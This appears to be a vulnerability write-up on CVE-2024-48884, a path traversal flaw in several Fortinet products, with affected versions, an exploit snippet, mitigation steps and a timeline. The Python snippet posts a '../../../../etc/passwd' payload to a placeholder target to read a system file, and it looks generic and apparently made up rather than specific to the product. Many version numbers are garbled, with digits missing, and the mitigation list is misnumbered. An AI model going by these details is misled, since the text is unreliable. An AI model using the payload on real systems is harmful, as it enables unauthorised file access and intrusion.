CVE-2024-48884: Path Traversal Vulnerability in Fortinet FortiManager, FortiOS, and FortiProxy Leads to Privilege Escalation

A new path traversal vulnerability has been discovered in multiple Fortinet products, including FortiManager versions 7.6. through 7.6.1, 7.4.1 through 7.4.3, FortiOS versions 7.6., 7.4. through 7.4.4, 7.2.5 through 7.2.9, 7.. through 7..15, 6.4. through 6.4.15, FortiProxy 7.4. through 7.4.5, 7.2. through 7.2.11, 7.. through 7..18, 2.. through 2..14, 1.2. through 1.2.13, 1.1. through 1.1.6, 1.. through 1..7, and FortiManager Cloud versions 7.4.1 through 7.4.3. This vulnerability, which is assigned the CVE identifier CVE-2024-48884, can be exploited by an attacker to escalate privileges through the use of specially-crafted packets.

Exploit Details

The vulnerability is caused by improper limitation of a pathname to a restricted directory, commonly known as 'path traversal'. This allows an attacker to traverse the directory structure outside of the restricted directory, potentially gaining unauthorized access to sensitive information and system resources.

The following code snippet demonstrates how an attacker might create a specially-crafted packet to trigger the path traversal vulnerability:

import requests

target_url = "http://target_ip_address:port/";
path_to_traverse = "../../../../../../../../etc/passwd"

payload = {
  "action": "read",
  "path": path_to_traverse
}

response = requests.post(target_url, json=payload)

if response.status_code == 200:
  print("Successful exploit:")
  print(response.text)
else:
  print("Exploit failed.")

By sending this packet to the target system, an attacker may be able to exploit the path traversal vulnerability and escalate their privileges on the affected system.

Original References

Fortinet has released security advisories for each of the affected products, which can be found at the following links:

- FortiManager Advisory
- FortiOS Advisory
- FortiProxy Advisory
- FortiManager Cloud Advisory

Users are strongly encouraged to review these advisories and apply the necessary patches as soon as possible to mitigate the risk associated with this vulnerability.

Mitigation and Recommendations

To mitigate the risk associated with CVE-2024-48884, users of the affected Fortinet products should take the following steps:

Apply the appropriate security patches provided by Fortinet for this vulnerability.

2. Regularly perform security audits and vulnerability assessments on your systems to ensure that they are up-to-date.
3. Implement the principle of least privilege in your organization and restrict directory access permissions.

Timeline

Published on: 01/14/2025 14:15:32 UTC
Last modified on: 02/03/2025 22:18:16 UTC